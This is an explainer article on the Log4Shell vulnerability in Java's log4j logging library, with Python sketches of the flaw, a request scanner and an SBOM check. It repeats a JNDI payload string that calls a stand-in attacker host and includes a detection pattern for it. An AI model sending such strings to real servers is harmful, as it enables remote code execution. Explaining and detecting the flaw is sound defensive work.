What's the Deal with the Log4Shell Security Nightmare?

Nicholas Weaver
Friday, December 10, 2021, 4:38 PM

The details behind a massive cyber problem.

("Hackers (pt. 2)" by Ifrah Yousuf, https://cybervisuals.org/visual/hackers-pt-2/, is licensed under CC BY 4.0, https://creativecommons.org/licenses/by/4.0/)

Published by The Lawfare Institute

We live in a strange world. What started out as a Minecraft prank, where a message in chat like ${jndi:ldap://attacker.com/pwnyourserver} would take over either a Minecraft server or client, has now resulted in a five-alarm security panic as administrators and developers all over the world desperately try to fix and patch systems before the cryptocurrency miners, ransomware attackers and nation-state adversaries rush to exploit thousands of software packages.

On Dec. 9, Chen Zhaojun of the Alibaba Cloud Security Team discovered, tweeted out and released sample code for a vulnerability, now dubbed Log4Shell, in a very common Java library called log4j that is used by thousands of projects. Any project using log4j is potentially vulnerable. The vulnerability was first discovered in Minecraft and thought to involve only the gaming platform, but quick exploration revealed that it potentially affects any software using this library.

Not only does the vulnerability affect thousands of programs, but exploiting it is very straightforward. Attackers are already starting to launch widespread attacks. Further compounding the problem is the huge diversity of vulnerable systems, so those responsible for defending systems are going to have a very bad Christmas.

So what is log4j? 

The first rule of being a good programmer is don’t reinvent things. Instead we reuse code libraries, packages of previously written code that we can just use in our own programs to accomplish particular tasks. And let’s face it, computer systems are finicky beasts, and errors happen all the time. One of the most common ways to find problems is to simply record everything that happens. When programmers do it, we call it “logging.” And good programmers use a library to do so rather than just scattering a bunch of print() statements (meaning print-to-screen) through their code. Log4j is one such library, an incredibly popular one for Java programmers.
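To make the difference between a logging library and scattered print() statements concrete, here is a minimal sketch. It uses Python's standard logging module as a stand-in for log4j (which is a Java library); the logger name "demo_app" and the handle_login function are hypothetical and exist only for illustration.

```python
import io
import logging

def build_logger(stream):
    """Return a logger that writes leveled, labeled records to `stream`."""
    logger = logging.getLogger("demo_app")  # hypothetical application name
    logger.setLevel(logging.INFO)           # record INFO and above, drop DEBUG
    logger.handlers.clear()                 # avoid duplicate handlers on re-run
    handler = logging.StreamHandler(stream)
    handler.setFormatter(logging.Formatter("%(levelname)s %(name)s: %(message)s"))
    logger.addHandler(handler)
    logger.propagate = False                # keep output confined to `stream`
    return logger

def handle_login(logger, username):
    # The username comes from the outside world and ends up in the log.
    logger.info("login attempt for user %s", username)

buffer = io.StringIO()
log = build_logger(buffer)
handle_login(log, "alice")
log.debug("this line is filtered out at INFO level")
output = buffer.getvalue()
print(output, end="")
```

The library handles levels, formatting and destinations in one place. Note that the logged username is data supplied by someone else, which is exactly the kind of input that matters for this vulnerability.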

Unfortunately, log4j contains a very easy-to-exploit vulnerability, leaving an enormous number of projects vulnerable. Recall the famous XKCD “dependency” comic: Almost every project written in Java (and there are a lot of programs, ranging from major products like Minecraft to Internet of Things devices to bespoke custom software) is going to include log4j or a similar library. So if there is a vulnerability in log4j, it now potentially affects huge swaths of digital infrastructure.

So how does the vulnerability work? 

Java has a design flaw in it: It has a lot of complexity and the ability to load arbitrary pieces of code and execute them. The most common way this flaw expresses itself is through deserialization, the ability to take a piece of data and turn it back into a Java object, complete with code that is executed with the object. The log4j vulnerability is a combination of Java’s serialization tendencies with an intermingling of code and data in the logging infrastructure.

Log4j’s formatting language includes the ability to trigger code. So when a message containing the string ${jndi:ldap://attacker.com/pwnyourserver} is logged, Java will attempt to fetch the object referred to from the remote server, deserialize it and run the appropriate code. And, of course, there are a lot of toolkits already available to take advantage of this class of vulnerability simply because it is such a common problem in Java systems.
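The intermingling of code and data described above can be illustrated with a toy formatter. This is a deliberately simplified Python sketch, not log4j's actual implementation: the names unsafe_format, safe_format, HANDLERS and fake_remote_fetch are all invented for illustration, and the "remote fetch" only records the URL rather than touching the network.

```python
import re

# Matches ${prefix:value} lookups, e.g. ${jndi:ldap://host/path}
LOOKUP = re.compile(r"\$\{([a-z]+):([^}]*)\}")

fetched = []  # records every URL the toy "remote fetch" was asked for

def fake_remote_fetch(url):
    """Stand-in for a network lookup; it only records the request."""
    fetched.append(url)
    return "<object from " + url + ">"

# Hypothetical lookup handlers keyed by prefix.
HANDLERS = {
    "env": lambda key: {"USER": "svc-account"}.get(key, ""),
    "jndi": fake_remote_fetch,
}

def unsafe_format(message):
    """Expand lookups anywhere in the message, including attacker-supplied data."""
    def expand(match):
        handler = HANDLERS.get(match.group(1))
        return handler(match.group(2)) if handler else match.group(0)
    return LOOKUP.sub(expand, message)

def safe_format(message):
    """Treat the message purely as data: no lookups are expanded."""
    return message

user_agent = "${jndi:ldap://attacker.com/pwnyourserver}"
line = unsafe_format("request from user-agent " + user_agent)
print(line)
print(fetched)
```

The point of the sketch is that the formatter cannot tell the programmer's own text from the attacker's text once they are joined into one message, so a lookup hidden in user data gets acted on. In the real vulnerability the equivalent of fake_remote_fetch retrieves and runs an attacker-controlled object.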

The basic requirement for an attacker to exploit the vulnerability is that the attacker needs to generate a message, any message, that the target program will log. It could be anything, such as the content of a URL, the username attempting to log in, or any other piece of data that the programmer thinks they might, perhaps, maybe, wish that they recorded. Then the vulnerable server needs the ability to connect back to the attacker in order to download the actual exploit. But as long as those two conditions are met, there are already straightforward tools to exploit this vulnerability.

So what is affected? 

A better question is “What is not affected?” For example, it turns out that somewhere in Apple’s infrastructure there is a Java program that logs the name of a user’s iPhone, so, as of a few hours ago, one could use this to exploit iCloud! The Minecraft and Steam gaming platforms are both written in Java and both end up having code paths that log chat messages, which means that they are also vulnerable. Many custom web services naturally log the “user-agent” string, the part of the request that tells the web server what browser you are running. Attackers are already taking advantage of that, sending malicious requests to compromise vulnerable servers. It wouldn’t surprise me if this article, were I to replace the example strings with actual malicious links, triggered some exploitation somewhere!
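As a rough illustration of how a defender might look for these probes, here is a small Python sketch that flags request fields containing the plain ${jndi: form. The request dictionaries and the suspicious_fields helper are hypothetical, and the pattern is an assumption that only catches the unobfuscated string shown in this article, so treat it as a starting point rather than a real detector.

```python
import re

# Assumption: only the plain "${jndi:" form is matched (case-insensitive).
JNDI_PATTERN = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

def suspicious_fields(request):
    """Return the names of request fields whose value contains a ${jndi: lookup."""
    return sorted(
        name for name, value in request.items() if JNDI_PATTERN.search(value)
    )

# Hypothetical requests, as a web service might see them before logging.
requests = [
    {"path": "/index.html", "user_agent": "Mozilla/5.0"},
    {"path": "/login", "user_agent": "${jndi:ldap://attacker.com/pwnyourserver}"},
    {"path": "/search?q=${JNDI:ldap://attacker.com/x}", "user_agent": "curl/7.79"},
]

flagged = [suspicious_fields(r) for r in requests]
print(flagged)
```

Any field that gets logged is a candidate, which is why the check walks every field rather than just the user-agent.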

So what now? 

The problem is in getting patches out to a huge number of projects. It’s an easy-to-exploit vulnerability that was also (almost) easily patched, notwithstanding the fact that the initial patch didn’t work correctly. But since log4j is a library used in many projects, these projects all need to be updated to incorporate the patch, or else they will be vulnerable to exploitation. And a programmer might not even know that this vulnerability exists in their code because they might be using some other library that depends on the log4j library.

So it isn’t a matter of patching one program but patching potentially thousands, and at least some programs won’t be patchable until code they depend on is first patched.
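The indirect-dependency problem can be sketched as a walk over a dependency graph. The project names and the deps mapping below are made up for illustration; real build tools track this information in their own formats.

```python
def depends_on(deps, project, target, seen=None):
    """Return True if `project` reaches `target` directly or through other libraries."""
    seen = set() if seen is None else seen
    if project in seen:          # already explored (also guards against cycles)
        return False
    seen.add(project)
    direct = deps.get(project, [])
    return target in direct or any(
        depends_on(deps, dep, target, seen) for dep in direct
    )

# Hypothetical projects and the libraries each one lists directly.
deps = {
    "billing-service": ["web-framework", "json-parser"],
    "web-framework": ["log4j"],
    "json-parser": [],
    "chat-server": ["log4j"],
    "static-site": ["json-parser"],
}

affected = sorted(p for p in deps if depends_on(deps, p, "log4j"))
hidden = [p for p in affected if "log4j" not in deps[p]]
print(affected)
print(hidden)
```

Here billing-service never mentions log4j in its own dependency list, yet it is affected through web-framework, and it cannot be fully fixed until web-framework ships a patched release.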

What about policy issues? 

There is often talk about the need for a software bill of materials (SBOM) in systems. An SBOM is a machine-readable list of all external components including libraries, the libraries used by those libraries, and so on. A recent executive order, in fact, mandated SBOMs for government-purchased systems.

A correct and complete SBOM is how one would discover that a random piece of code has this vulnerability since the SBOM concept is designed to record these dependency chains. This is why the executive order included a focus on SBOMs, so that at least the government can know, in theory, how many of their systems are trivially vulnerable.  

The federal government is using its market power to make SBOMs a widely adopted practice in the software industry. This vulnerability represents a clear case demonstrating why an SBOM should be a critical requirement: having an SBOM that includes a reference to log4j version 2.14.1 is a clear indication that a larger software system contains this vulnerability.
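As a sketch of what that check could look like, the following Python snippet scans a machine-readable component list for log4j. The JSON layout is a simplified assumption, not a real SBOM standard, and the version range (2.x up to and including 2.14.1) is an assumption built around the version named above; the component entries are invented for the example.

```python
import json

# Assumption: flag log4j 2.x versions up to and including 2.14.1.
VULNERABLE_MAX = (2, 14, 1)

def parse_version(text):
    """Turn a purely numeric dotted version like '2.14.1' into (2, 14, 1)."""
    return tuple(int(part) for part in text.split("."))

def vulnerable_components(sbom_json):
    """Return 'name version' strings for log4j entries in the flagged range."""
    sbom = json.loads(sbom_json)
    hits = []
    for component in sbom["components"]:
        if component["name"] != "log4j":
            continue
        version = parse_version(component["version"])
        if (2,) <= version <= VULNERABLE_MAX:
            hits.append(component["name"] + " " + component["version"])
    return hits

# Hypothetical, simplified SBOM for one software system.
EXAMPLE_SBOM = json.dumps({
    "components": [
        {"name": "log4j", "version": "2.14.1"},
        {"name": "log4j", "version": "2.17.0"},
        {"name": "json-parser", "version": "1.3.0"},
    ]
})

hits = vulnerable_components(EXAMPLE_SBOM)
print(hits)
```

Because the SBOM lists components at every level of the dependency chain, a single pass like this can surface a vulnerable library even when the top-level project never references it directly.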

Final Thoughts

A lot of system administrators just saw their weekends ruined. So please have sympathy for them. This is a real crisis, and if it doesn’t explode in all of our faces it will be the result of the hard work of many individuals and groups around the world working frantically to mitigate this problem.

Nicholas Weaver is a senior staff researcher focusing on computer security at the International Computer Science Institute in Berkeley, California, and Chief Mad Scientist/CEO/Janitor of Skerry Technologies, a developer of low cost autonomous drones. All opinions are his own.
